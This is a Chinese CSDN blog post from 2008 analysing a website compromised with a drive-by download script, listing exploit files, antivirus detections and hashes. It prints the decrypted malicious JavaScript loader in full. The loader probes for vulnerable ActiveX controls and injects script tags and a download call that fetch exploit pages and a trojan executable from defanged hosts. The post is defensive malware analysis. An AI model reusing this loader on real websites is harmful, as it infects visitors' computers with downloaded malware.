某驱动开发网被挂马Trojan.DL.Win32.Small.gkm

最新推荐文章于 2018-12-16 12:30:17 发布
最新推荐文章于 2018-12-16 12:30:17 发布
阅读量1.3k 收藏
点赞数
分类专栏: 系统安全 文章标签: object javascript 360 div url 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2060908
版权

某驱动开发网被挂马Trojan.DL.Win32.Small.gkm

endurer 原创
2008-01-23 第1

打开该网站,Kaspersky报告:
2008-1-21 14:30:41 恶意 HTTP 对象 <hxxp://list**.ad*s**looks.info/list.js>: 已检测 木马程序 Trojan-Downloader.JS.Small.js.

检查网站首页代码,发现:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://list**.ad*s**looks.info/list.js"></SCRIPT>
---/

可能是该网站服务器所在机房有ARP病毒在做怪。

hxxp://list**.ad*s**looks.info/list.js的代码解密为后为:
/---
if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<script src=hxxp://k***.2*2**2*360.com/6.gif><//script>");if(e!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/1.gif><//script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/2.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/3.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/4.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("<iframe style=display:none src=hxxp://k***.2*2**2*360.com/5.gif></iframe>")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("hxxp://k***.2*2**2*360.com/ads/ads.cab","ads.exe",0);document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}}}<script src=hxxp://k***.2*2**2*360.com/6.gif></script><script src=hxxp://k***.2*2**2*360.com/3.gif></script><DIV style="CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')"></DIV>
---/


1. hxxp://k***.2*2**2*360.com/6.gif 包含利用RealPlayer漏洞利用代码

2. hxxp://k***.2*2**2*360.com/1.gif
Kaspersky 报为 Trojan-Downloader.JS.Small.en,包含 利用 MS06014 漏洞下载 hxxp://k***.2*2**2*360.com/ads/ads.jpg.exe 的 JavaScript 脚本代码

文件说明符 : D:/test/ads.jpg.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-23 13:15:50
修改时间 : 2007-11-23 13:15:50
访问时间 : 2008-1-22 0:0:0
大小 : 6656 字节 6.512 KB
MD5 : f81ce2b0f46ca9ced6558fdadfb45099
SHA1: 90E14F9049B51DF1BF70A8363162C782B321714E
CRC32: d55ccaa9

Kaspersky 报为 Trojan-Downloader.Win32.Small.gkm,感星报为 Trojan.DL.Win32.Small.gkm

3. hxxp://k***.2*2**2*360.com/2.gif
包含 利用暴风影音漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe 的JavaScript 脚本代码

ads.exe 与 ads.jpg.exe 相同

4. hxxp://k***.2*2**2*360.com/ads.c
利用 ANI漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe

5 hxxp://k***.2*2**2*360.com/3.gif
包含利用PPStream漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码

5. hxxp://k***.2*2**2*360.com/4.gif
包含利用迅雷漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码

6. hxxp://k***.2*2**2*360.com/5.gif
Kaspersky报为 Trojan-Downloader.JS.Small.jh
利用联众世界GLChat.ocx 控件漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe

7.hxxp://k***.2*2**2*360.com/ads/ads.cab 包含 ads.exe 

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
操作123456
qq_65648226的博客
04-28 2663
1.拼音缩写函数 DELIMITER $$ USE `mpos`$$ CREATE FUNCTION `mysql`.`pysx`( wz VARCHAR(20)) RETURNS VARCHAR(20) CHARSET utf8 BEGIN SET @i=1; SET @mcsx=''; SET @len=CHAR_LENGTH(wz); WHILE(@i<=@len) DO S...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析
Purpleendurer@CSDN
02-21 1592
Trojan.DL.Win32.Mnless.yxx / alg.exe 的一点分析endurer 原创2008-02-21 第1版就是Worm.Win32.Diskgen.gen/磁碟机也捎带广告?http://blog.csdn.net/Purpleendurer/archive/2008/02/20/2110363.aspx中的捕获的一个病毒文件。文件说明符 : C:
络硬盘站被植入传播Trojan.DL.Inject.xz等的代码
Purpleendurer@CSDN
04-30 2059
endurer 原创2007-04-30 第1版该站的留言板页面:/---<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>---/被植入代码:/---<iframe src
又是神经络!还能用来盗取XX女演员信息
weixin_33854644的博客
05-02 940
四月初,名为Egor Tsvetkov的俄罗斯摄影师利用照片和应用程序FindFace(能利用面部识别将社交媒体帐户信息与照片联系起来的神经络),向我们展示了我们究竟故意在上泄露了多少信息。不幸的是,他试图警告我们的东西已经变为了现实。 据Global Voices报道,在俄罗斯媒体报道了Tsvetkov的项目过后三天,俄罗斯类似4Chan的在线...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic , At your OWN risk .
敲诈者(Trojan.Disclies.e)解决方案
03-04
敲诈者木程序以敲诈勒索钱财为目的,使得感染该木的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木程序而导致计算机系统数据文件丢失的情况。该木...
js.scob.trojan.nasl
最新发布
11-08
js.scob.trojan
trojan-1.16.0-win.zip
04-01
trojan
ASP写的Trojan
鱼汤的技术资料库
04-24 1527
ASP editv/:*    {   BEhAviOR:URL(#dEFAULt#vmL);}BOdY, div, SpAn, Li, td, A {   cOLOR: #666666;   FOnt-SizE: 12px !impORtAnt;   FOnt-SizE: 11px;   FOnt-FAmiLY: tAhOmA, ARiAL, cOURiER nEw, vERdAnA, SA
某政府站被加入自动下载病毒文件的代码(第3版)
Purpleendurer@CSDN
12-23 3234
endurer 原创2006.02.15 第3版 江民KV2006将yudi[1].js报为Exploit.MhtRedir.mzj。2005.12.14 第2版 添加了瑞星的回复及多反病毒引擎扫描的结果。2005.12.13 第1版注:文中的病毒来源IP地址均用XX代替。今天在浏览某政府站首页时,有病毒文件被自动下载。分析了一下:在该站的首页index.htm首部
又一个自动下载病毒的政府站(第3版)
Purpleendurer@CSDN
02-11 2850
endurer 原创2006-02-15 第3版 瑞星将xxxxx.pif 报为:Backdoor.Gpigeon.vhq,卡巴斯基将xxxxx.pif 报为:Backdoor.Win32.Hupigon.lz2006-02-10 第2版 江民KV2006将xxxxx.pif 报为:Backdoor/Huigezi.cbf2006-02-09 第1版今天又发现一个被被加入自动下载病毒文件的
驱动人生被曝利用高危漏洞传播病毒,半天感染数万台电脑
weixin_44046696的博客
12-16 748
12月15日消息 据火绒安全官消息,12月14日,火绒安全团队发现“驱动人生”旗下多款软件携带后门病毒DTStealer,仅半天时间感染了数万台电脑。该病毒进入电脑后,继续通过“永恒之蓝”高危漏洞进行全传播(特别是政企单位局域),并回传被感染电脑的IP地址、CPU型号等信息。 据悉,目前截获的病毒没有携带其他攻击模块,只是“潜伏”。病毒服务器只开放了不到10个小时即关闭,但是已经感染数...
手工清除Windows服务器上的Steam挖矿病毒:HackTool/CoinMiner.a及Trojan/Miner.ac
chetiao3271的博客
05-03 1万+
手工清除Windows服务器上的Steam挖矿病毒:HackTool/CoinMiner.a及Trojan/Miner.ac 起因: 最近服务器群里的两台Windows虚拟服务器上的CPU占用率超级高(已经达到了91%),严重影响公司程序的正常运行,但是又不能安装杀毒软件(...
某留学站被植入利用 PPStream 堆栈漏洞的代码
Purpleendurer@CSDN
09-30 1424
某留学站被植入利用 PPStream 堆栈漏洞的代码endurer 原创2007-09-30 第1版站被植入代码:/---<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe> ---/hxxp://xxx.7**45*97**0.com/newdm/new05.ht
又杀了一批病毒(第2版)
Purpleendurer@CSDN
12-23 4627
endurer 原创2005.12.21  第2版 补充了瑞星对Tvdpay.exe的反应。2005.12.20  第1版  昨天帮一位友杀了一批病毒,包括几个灰鸽子。  该友的电脑使用Window XP,连SP1系统补丁也没打。虽然装有江民KV,但还是成了毒窝。不定时弹出多个广告窗口,桌面和开始菜单也被加入恶意站的链接。  先用瑞星在线免费扫描,结果如下:2005-12-19 15:53:
python PyQt5 实现点击按钮弹出一个窗口
热门推荐
竦貊的博客
06-18 3万+
嘛,我今天就送一下福利吧 PyQt5练习源码 1. 实现功能 首界面 点击进入系统后弹出界面 点击代码查重后弹出界面 请注意:这仅仅只是一个我写的模板,本来打算然他们接着开发的,结果没整出来。你可以去对它进行美化等等 2. 如果您下载了压缩包,请按照以下方法使用。 解压之后的截图应该这样的 界面的设计也有类似的主函数,连接着所有窗口的主代码——PYTHON_UI....
AVAudioSession初探
weixin_30405421的博客
09-18 240
根据文档,AudioSession规定了app和系统音频行为交互的规范,一个app只有一个AudioSession的单例。 app通过设置自己AudioSession的单例的属性来告诉系统自身想达到的效果,系统会根据app的申请,并综合考虑其他app的AudioSession的属性来决定最后硬件的音频输入和输出。 AVAudioSession的category AVAudioSession...
Trojan-Downloader.Win32.Agent.bbb 木手动查杀
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木: ...6. 最后,重启电脑,确保所有更改生效并且Trojan-Downloader.Win32.Agent.bbb木已经被完全清除。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值